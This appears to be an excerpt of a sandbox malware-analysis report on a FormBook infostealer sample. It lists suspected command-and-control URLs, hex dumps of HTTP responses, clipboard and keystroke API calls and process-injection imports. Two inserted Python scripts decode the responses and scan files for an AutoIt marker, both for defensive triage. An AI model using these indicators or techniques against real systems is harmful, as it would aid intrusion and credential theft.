91 3c 2a 6e b2 57 2b e9 37 97 2d 92 dc 1a 90 bf 17 c8 4e d3 ff a9 0d 06 06 cb 8e b6 94 86 52 08 9e f4 71 d0 26 68 43 58 00 80 01 30 ff b7 ac 14 4a 4e 19 09 1b d1 52 de 67 14 32 33 b5 01 fd bf aa de f3 4c cf 80 d9 00 66 57 69 56 b7 40 ca b3 77 27 e5 5f d5 61 7e f7 8c 74 d5 33 0a dd 7b 0e bd a7 d4 eb d8 0a 29 a2 04 45 a0 69 08 01 40 13 dc bb 0a 09 10 9b d9 d0 2c 02 40 04 58 3f 86 69 cd ae dd d3 76 ef 25 8a 88 f8 81 1a 93 d7 30 ab dd db dc d7 7d 66 b6 49 04 44 a3 44 51 31 5d 0e 4b db 6e df df 06 11 11 aa a4 aa 8f a1 da fd 03 a2 22 3f d9 cb 74 95 6b ee a5 c2 8a 55 8c 84 ba 14 02 26 3e dc bd 3b 85 56 cf 5e 75 f3 92 a0 61 1f 3f f4 71 30 f7 b4 38 bb 3e 09 e7 31 94 24 e4 2b ef c2 40 31 4b 82 a0 a3 46 51 af 28 9d ae a3 30 d0 fb 24 e6 6b a1 b1 cc 60 f1 eb ac c8 d9 83 0d 3e 7a bd 57 d4 8a 0b 53 ad 38 22 1b 56 fd 44 1c 8a e3 51 cc 44 48 fc 41 7d b8 6a 7c 50 ed b1 50 3e 7e f2 ea 6f f4 25 11 7d b0 04 d4 33 85 b5 99 ff df 26 51 02 ea 39 81 11 fe ef 4f 28 c3 94 09 4e 19 af 6a e6 d5 df 58 c0 3c 4d d3 ee 02 d9 f2 4f 1d 5d 72 77 5c 7c b5 df c5 11 c1 d8 00 13 71 fd c4 4c ff b5 c9 b3 6c 07 8f f6 15 af f0 ad f0 27 65 cd fe d5 3e a0 bb 77 5a 99 57 70 a8 cb 48 1a cf 0e ee 7e 83 50 9f a2 5d 44 4c 99 cd 9c 7d c5 6b 63 33 cf 67 02 0b fe 62 9f 35 90 e0 db 6e 2d 82 b2 66 16 8c 26 26 79 d8 3d dc f9 e0 5b 44 a9 fa 59 d2 17 8e ff 6f 36 6b 10 e5 8c a0 70 9b 7c 65 db 16 4d f0 b8 28 8e 35 90 ca f9 bd 27 2c 78 b8 3b 90 fd 3f 64 35 74 d8 da 17 f5 01 43 50 e6 e8 a1 84 91 1c 84 c7 8f 4e 93 c2 a3 f7 dc cf f6 33 cf 07 6e dd 71 df e7 66 d2 7e 56 5b 87 fb 19 80 2f e0 7e 96 2d 79 ca e7 fb d9 3a bf ac f3 fd 8c 50 82 97 40 0a 72 9c 8c ef 06 4a fc f9 08 Data Ascii: 508ff":DT~Xk31X_j|H2t%cdtew1askO!+^V|li3a8!co9d;L?yM$4xu;qf?BDV@57
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 2ea_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://rokeyfashion.store/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Sat, 11 Jan 2025 08:16:10 GMTserver: LiteSpeedData Raw: 35 30 39 30 0d 0a 94 96 17 66 22 ec 3a a9 fd 87 44 54 d5 7e 58 91 81 6b d6 0f 01 aa 33 31 c6 0d fd f1 eb cf bf bf 08 8c 9b f8 58 e7 f9 fe df 5f 6a ff ed fc 7c dd e8 9d 1a e8 48 32 e0 1d 97 74 d6 ed a4 d3 be 25 ce 63 64 74 b1 95 08 89 91 84 b1 87 f1 65 cb aa 77 f7 e7 95 31 ec 61 d5 a4 dc ca d4 01 c8 73 1c e7 6b 4f 81 84 21 0a 03 2b a0 ca 5e 87 ff f6 be 56 ff 9d fc 7c b1 6c 69 33 b5 1b 61 38 08 21 a5 63 6f 39 ce 64 3b f3 4c 3f f7 79 af 0b c1 91 4d b7 24 34 80 ec 78 1e f7 b6 f6 75 3b 71 9c f7 18 66 3f 0a 42 44 16 f9 04 b5 f5 56 40 35 d4 37 8b 5d 49 74 f0 e7 f7 a6 9f 7c 4b 67 0b 77 01 da 4d 82 5a d7 4a 3f a8 a3 84 55 98 7c b6 e8 9c 73 2f 78 53 c0 a8 80 51 01 a3 02 24 2b 65 64 09 d4 73 cf 2d ef cd 9b 91 3c 2a 6e b2 57 2b e9 37 97 2d 92 dc 1a 90 bf 17 c8 4e d3 ff a9 0d 06 06 cb 8e b6 94 86 52 08 9e f4 71 d0 26 68 43 58 00 80 01 30 ff b7 ac 14 4a 4e 19 09 1b d1 52 de 67 14 32 33 b5 01 fd bf aa de f3 4c cf 80 d9 00 66 57 69 56 b7 40 ca b3 77 27 e5 5f d5 61 7e f7 8c 74 d5 33 0a dd 7b 0e bd a7 d4 eb d8 0a 29 a2 04 45 a0 69 08 01 40 13 dc bb 0a 09 10 9b d9 d0 2c 02 40 04 58 3f 86 69 cd ae dd d3 76 ef 25 8a 88 f8 81 1a 93 d7 30 ab dd db dc d7 7d 66 b6 49 04 44 a3 44 51 31 5d 0e 4b db 6e df df 06 11 11 aa a4 aa 8f a1 da fd 03 a2 22 3f d9 cb 74 95 6b ee a5 c2 8a 55 8c 84 ba 14 02 26 3e dc bd 3b 85 56 cf 5e 75 f3 92 a0 61 1f 3f f4 71 30 f7 b4 38 bb 3e 09 e7 31 94 24 e4 2b ef c2 40 31 4b 82 a0 a3 46 51 af 28 9d ae a3 30 d0 fb 24 e6 6b a1 b1 cc 60 f1 eb ac c8 d9 83 0d 3e 7a bd 57 d4 8a 0b 53 ad 38 22 1b 56 fd 44 1c 8a e3 51 cc 44 48 fc 41 7d b8 6a 7c 50 ed b1 50 3e 7e f2 ea 6f f4 25 11 7d b0 04 d4 33 85 b5 99 ff df 26 51 02 ea 39 81 11 fe ef 4f 28 c3 94 09 4e 19 af 6a e6 d5 df 58 c0 3c 4d d3 ee 02 d9 f2 4f 1d 5d 72 77 5c 7c b5 df c5 11 c1 d8 00 13 71 fd c4 4c ff b5 c9 b3 6c 07 8f f6 15 af f0 ad f0 27 65 cd fe d5 3e a0 bb 77 5a 99 57 70 a8 cb 48 1a cf 0e ee 7e 83 50 9f a2 5d 44 4c 99 cd 9c 7d c5 6b 63 33 cf 67 02 0b fe 62 9f 35 90 e0 db 6e 2d 82 b2 66 16 8c 26 26 79 d8 3d dc f9 e0 5b 44 a9 fa 59 d2 17 8e ff 6f 36 6b 10 e5 8c a0 70 9b 7c 65 db 16 4d f0 b8 28 8e 35 90 ca f9 bd 27 2c 78 b8 3b 90 fd 3f 64 35 74 d8 da 17 f5 01 43 50 e6 e8 a1 84 91 1c 84 c7 8f 4e 93 c2 a3 f7 dc cf f6 33 cf 07 6e dd 71 df e7 66 d2 7e 56 5b 87 fb 19 80 2f e0 7e 96 2d 79 ca e7 fb d9 3a bf ac f3 fd 8c 50 82 97 40 0a 72 9c 8c ef 06 4a fc f9 08 Data Ascii: 5090f":DT~Xk31X_j|H2t%cdtew1askO!+^V|li3a8!co9d;L?yM$4xu;qf?BDV@57
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2604361912.0000000005578000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rokeyfashion.store
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2604361912.0000000005578000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rokeyfashion.store/nfd2/
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.livechatinc.com/tracking.js
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.plugins.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: TCPSVCS.EXE, 00000005.00000003.1853958039.0000000007431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shorty.bio/zSKcZ7
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechatinc.com/?welcome
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechatinc.com/chat-with/13793973/
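                The 404 records above are shown the way Joe Sandbox renders them: the response headers run together, followed by a "Data Raw" hex dump of the body, which is chunked and usually gzip- or brotli-encoded. FormBook is known to contact a list of candidate domains of which most are decoys that answer with ordinary 404 pages, so the useful triage step is to recover which vhost actually answered each request (Apache prints it in its ServerSignature line, the LiteSpeed responses expose it in the WordPress Link header) and to cross-check those hosts against the URLs recovered from process memory in the "String found in binary or memory" entries; the host that appears in both places, here the one carrying the /nfd2/ path, is the one to look at first. The Python below is an added example for this report, not Joe Sandbox code. The record it decodes is constructed: the Apache 404 body is the one the report shows for www.vietnamtour.pro, re-framed as a chunked gzip response and rendered in the same hex-dump format, and the header strings and memory strings are copied from the entries above. Brotli bodies are left undecoded because that needs the third-party brotli package.

```python
"""Decode the "Data Raw" dumps of the HTTP responses above and correlate the
answering hosts with URLs Joe Sandbox found in process memory.
Added example, not Joe Sandbox code; the sample data below is constructed."""
import gzip
import re
import zlib
from typing import Dict, Iterable, Optional, Set, Tuple


def parse_data_raw(hexdump: str) -> bytes:
    """'66 30 0d 0a ...' -> bytes; whitespace and line wraps are ignored."""
    return bytes.fromhex("".join(hexdump.split()))


def dechunk(wire: bytes) -> bytes:
    """Strip HTTP/1.1 chunked framing; a truncated dump yields what was captured."""
    out, pos = bytearray(), 0
    while True:
        eol = wire.find(b"\r\n", pos)
        if eol < 0:
            break
        try:
            size = int(wire[pos:eol].split(b";")[0].strip(), 16)  # drop chunk extensions
        except ValueError:
            break
        if size == 0:
            break
        pos = eol + 2
        out += wire[pos:pos + size]
        pos += size + 2  # CRLF terminating the chunk data
    return bytes(out)


def decode_body(headers: str, hexdump: str) -> bytes:
    """Undo the transfer and content encodings named in the run-together header text."""
    raw = parse_data_raw(hexdump)
    if re.search(r"transfer-encoding:\s*chunked", headers, re.I):
        raw = dechunk(raw)
    # Explicit alternatives, because the report glues the next header name on ("brvary:").
    enc = re.search(r"content-encoding:\s*(gzip|deflate|br)", headers, re.I)
    coding = enc.group(1).lower() if enc else "identity"
    if coding == "gzip":
        # decompressobj returns the prefix of a truncated stream instead of raising
        raw = zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(raw)
    elif coding == "br":
        raise NotImplementedError("brotli body (LiteSpeed records): needs the 'brotli' package")
    return raw


APACHE_SIGNATURE = re.compile(r"Server at ([\w.\-]+) Port \d+", re.I)
LINK_HEADER = re.compile(r"link:\s*<https?://([\w.\-]+)/", re.I)


def normalize_host(host: str) -> str:
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def responding_host(headers: str, body: str) -> Optional[str]:
    """Which vhost answered: Apache's ServerSignature line, else the WordPress Link header."""
    m = APACHE_SIGNATURE.search(body) or LINK_HEADER.search(headers)
    return normalize_host(m.group(1)) if m else None


def hosts_in_memory_strings(lines: Iterable[str]) -> Set[str]:
    """Hosts named by URL strings reported as 'String found in binary or memory'."""
    return {normalize_host(m.group(1))
            for line in lines for m in re.finditer(r"https?://([\w.\-]+)", line)}


def triage(records: Iterable[Tuple[str, str]], memory_lines: Iterable[str]) -> Dict[str, dict]:
    """Per answering host: status, whether the body decoded, and whether the same
    host also appears in the memory strings (the one to examine first)."""
    in_memory = hosts_in_memory_strings(memory_lines)
    result: Dict[str, dict] = {}
    for headers, hexdump in records:
        status = re.match(r"HTTP/\d\.\d (\d{3})", headers)
        try:
            body = decode_body(headers, hexdump).decode("latin-1")
        except NotImplementedError:
            body = ""
        host = responding_host(headers, body)
        if host:
            result[host] = {"status": status.group(1) if status else None,
                            "body_decoded": bool(body),
                            "url_in_memory": host in in_memory}
    return result


# Constructed sample data: the Apache 404 body is the one the report shows for
# www.vietnamtour.pro, re-framed as one gzip chunk plus the terminating chunk.
APACHE_404 = (b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n'
              b"<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n"
              b"<p>The requested URL was not found on this server.</p>\n<hr>\n"
              b"<address>Apache/2.4.41 (Ubuntu) Server at www.vietnamtour.pro Port 80</address>\n"
              b"</body></html>\n")


def build_record(body: bytes) -> str:
    gz = gzip.compress(body)
    return " ".join(f"{b:02x}" for b in b"%x\r\n%s\r\n0\r\n\r\n" % (len(gz), gz))


SAMPLE_HEADERS = ("HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:15:30 GMTContent-Type: text/html"
                  "Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip")
LITESPEED_HEADERS = ("HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8"
                     "link: <https://rokeyfashion.store/wp-json/>; rel=\"https://api.w.org/\""
                     "transfer-encoding: chunkedcontent-encoding: brserver: LiteSpeed")
MEMORY_STRINGS = ["http://www.rokeyfashion.store/nfd2/", "https://cdn.jsdelivr.net/npm/bootstrap"]

if __name__ == "__main__":
    records = [(SAMPLE_HEADERS, build_record(APACHE_404)),
               (LITESPEED_HEADERS, "35 30 39 30 0d 0a 94 96 17 66")]  # truncated brotli record
    for host, info in triage(records, MEMORY_STRINGS).items():
        print(host, info)
```

                To run it against the real records, paste the header text and the hex between "Data Raw:" and "Data Ascii:" of each entry into the records list; the gzip bodies decode as shown, the brotli ones are reported with body_decoded set to False but still yield the host from the Link header.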
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003A6B0C
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003A6D07
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003A6B0C
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00392B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00392B37

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00353D19 This is a third-party compiled AutoIt script.
                Source: xaqnaB0rcW.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: xaqnaB0rcW.exe, 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_3cba1e1e-8
                Source: xaqnaB0rcW.exe, 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: 8SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_56604ef7-5
                Source: xaqnaB0rcW.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_e9431e76-d
                Source: xaqnaB0rcW.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_03479444-6
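The rows above classify the sample as AutoIt-compiled from one marker string, `This is a third-party compiled AutoIt script.`, found both in the file on disk and in its memory dump. The script below is an added example, not part of the Joe Sandbox report or of any AutoIt tooling: it searches a file, a directory tree or a raw dump for that marker in ASCII and in UTF-16LE and reports the offsets. The input buffer is constructed for the demo. The marker lives in the AutoIt3 runtime stub, so a hit says only that the binary is an AutoIt build, benign tools included; it is a triage indicator, not a verdict.

```python
import os
import sys

# Marker string the report found in the sample (rows above). It belongs to the
# AutoIt3 runtime stub, so any AutoIt-compiled executable carries it.
AUTOIT_MARKER = "This is a third-party compiled AutoIt script."

# Compiled AutoIt binaries are Unicode builds, so check both encodings.
ENCODINGS = {
    "ascii": AUTOIT_MARKER.encode("ascii"),
    "utf-16le": AUTOIT_MARKER.encode("utf-16-le"),
}


def find_autoit_marker(data: bytes) -> list:
    """Return (offset, encoding) for every occurrence of the marker in data."""
    hits = []
    for name, needle in ENCODINGS.items():
        pos = data.find(needle)
        while pos != -1:
            hits.append((pos, name))
            pos = data.find(needle, pos + 1)
    return sorted(hits)


def scan_file(path: str) -> list:
    """Scan one file; works for PE files and raw memory dumps alike."""
    with open(path, "rb") as fh:
        return find_autoit_marker(fh.read())


def scan_tree(root: str) -> dict:
    """Walk a directory and map every file with a marker hit to its hits."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                hits = scan_file(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if hits:
                results[path] = hits
    return results


# Constructed test buffer, not a real sample: a 64-byte header stand-in, the
# neighbouring stub strings seen in the report, the marker as ASCII, filler,
# then the same marker as UTF-16LE.
SAMPLE_BLOB = (
    b"MZ" + b"\x00" * 62
    + b"runas" + ENCODINGS["ascii"] + b"Error allocating memory."
    + b"\x00" * 16
    + ENCODINGS["utf-16le"]
)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        hits = {"<constructed blob>": find_autoit_marker(SAMPLE_BLOB)}
    elif os.path.isdir(sys.argv[1]):
        hits = scan_tree(sys.argv[1])
    else:
        hits = {sys.argv[1]: scan_file(sys.argv[1])}
    for path, found in hits.items():
        for off, enc in found:
            print(f"{path}: AutoIt marker ({enc}) at offset 0x{off:x}")
```

Run it with a directory to sweep a sample store, with a single file or `.sdmp` dump to check one object, or with no argument to exercise the constructed buffer. The equivalent Yara rule is the same string declared once as `ascii` and once as `wide`; reporting offsets rather than a boolean lets an analyst see whether the text sits where the stub's string table would be or was pasted into an unrelated file.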
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C5B3 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037735C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03774340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03774650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C00 NtQueryInformationProcess
